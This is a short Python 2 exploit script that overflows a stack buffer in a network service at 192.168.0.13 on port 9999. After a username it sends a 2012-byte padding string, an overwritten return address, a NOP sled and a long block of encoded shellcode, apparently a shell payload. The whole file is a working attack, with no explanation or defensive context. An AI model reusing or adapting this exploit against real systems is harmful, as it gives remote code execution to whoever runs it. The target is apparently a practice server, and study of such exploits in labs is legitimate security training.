#!/usr/bin/env python

# deploying our shellcode

import sys, socket

username = "gibson"

payload = ("\xda\xc1\xba\xcc\x09\xbf\xc5\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x52\x83\xe8\xfc\x31\x50\x13\x03\x9c\x1a\x5d\x30\xe0\xf5\x23"
"\xbb\x18\x06\x44\x35\xfd\x37\x44\x21\x76\x67\x74\x21\xda\x84"
"\xff\x67\xce\x1f\x8d\xaf\xe1\xa8\x38\x96\xcc\x29\x10\xea\x4f"
"\xaa\x6b\x3f\xaf\x93\xa3\x32\xae\xd4\xde\xbf\xe2\x8d\x95\x12"
"\x12\xb9\xe0\xae\x99\xf1\xe5\xb6\x7e\x41\x07\x96\xd1\xd9\x5e"
"\x38\xd0\x0e\xeb\x71\xca\x53\xd6\xc8\x61\xa7\xac\xca\xa3\xf9"
"\x4d\x60\x8a\x35\xbc\x78\xcb\xf2\x5f\x0f\x25\x01\xdd\x08\xf2"
"\x7b\x39\x9c\xe0\xdc\xca\x06\xcc\xdd\x1f\xd0\x87\xd2\xd4\x96"
"\xcf\xf6\xeb\x7b\x64\x02\x67\x7a\xaa\x82\x33\x59\x6e\xce\xe0"
"\xc0\x37\xaa\x47\xfc\x27\x15\x37\x58\x2c\xb8\x2c\xd1\x6f\xd5"
"\x81\xd8\x8f\x25\x8e\x6b\xfc\x17\x11\xc0\x6a\x14\xda\xce\x6d"
"\x5b\xf1\xb7\xe1\xa2\xfa\xc7\x28\x61\xae\x97\x42\x40\xcf\x73"
"\x92\x6d\x1a\xd3\xc2\xc1\xf5\x94\xb2\xa1\xa5\x7c\xd8\x2d\x99"
"\x9d\xe3\xe7\xb2\x34\x1e\x60\x7d\x60\x20\x62\x15\x73\x20\x99"
"\xdc\xfa\xc6\xf7\x0e\xab\x51\x60\xb6\xf6\x29\x11\x37\x2d\x54"
"\x11\xb3\xc2\xa9\xdc\x34\xae\xb9\x89\xb4\xe5\xe3\x1c\xca\xd3"
"\x8b\xc3\x59\xb8\x4b\x8d\x41\x17\x1c\xda\xb4\x6e\xc8\xf6\xef"
"\xd8\xee\x0a\x69\x22\xaa\xd0\x4a\xad\x33\x94\xf7\x89\x23\x60"
"\xf7\x95\x17\x3c\xae\x43\xc1\xfa\x18\x22\xbb\x54\xf6\xec\x2b"
"\x20\x34\x2f\x2d\x2d\x11\xd9\xd1\x9c\xcc\x9c\xee\x11\x99\x28"
"\x97\x4f\x39\xd6\x42\xd4\x49\x9d\xce\x7d\xc2\x78\x9b\x3f\x8f"
"\x7a\x76\x03\xb6\xf8\x72\xfc\x4d\xe0\xf7\xf9\x0a\xa6\xe4\x73"
"\x02\x43\x0a\x27\x23\x46")

buffer = "A" * 2012 + "\xdf\x14\x50\x62" + "\x90" * 32

print("sending payload...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.13',9999))
s.recv(1024)
s.recv(1024)
s.sendall(username + '\r\n')
s.recv(1024)
s.sendall(buffer + payload + '\r\n')
s.close()
